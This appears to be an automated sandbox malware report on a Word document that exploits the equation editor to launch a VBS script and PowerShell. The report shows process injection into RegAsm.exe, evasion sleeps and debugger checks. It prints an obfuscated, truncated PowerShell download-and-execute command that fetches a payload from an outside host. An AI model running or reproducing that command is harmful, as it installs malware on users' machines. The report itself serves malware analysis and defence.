                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: xrrwwstCMd.docxStream path 'CONTENTS' entropy: 7.95677072568 (max. 8.0)
                    Source: ~WRD0000.tmp.0.drStream path 'CONTENTS' entropy: 7.95677072568 (max. 8.0)
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.drStream path '_1787386830/CONTENTS' entropy: 7.95677072568 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1183Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1141Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5161Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1518Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9757Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_12-54381
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3700Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep count: 5161 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep count: 1518 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -1800000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep count: 118 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep time: -354000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4056Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep count: 9757 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep time: -29271000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2956Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10006580 FindFirstFileExA,12_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00443355 mov eax, dword ptr fs:[00000030h]12_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]12_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,12_2_00411D39
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002B1C

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                    Contains functionality to inject code into remote processes
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_0041812A
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00419662 mouse_event,12_2_00419662
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" Jump to behavior
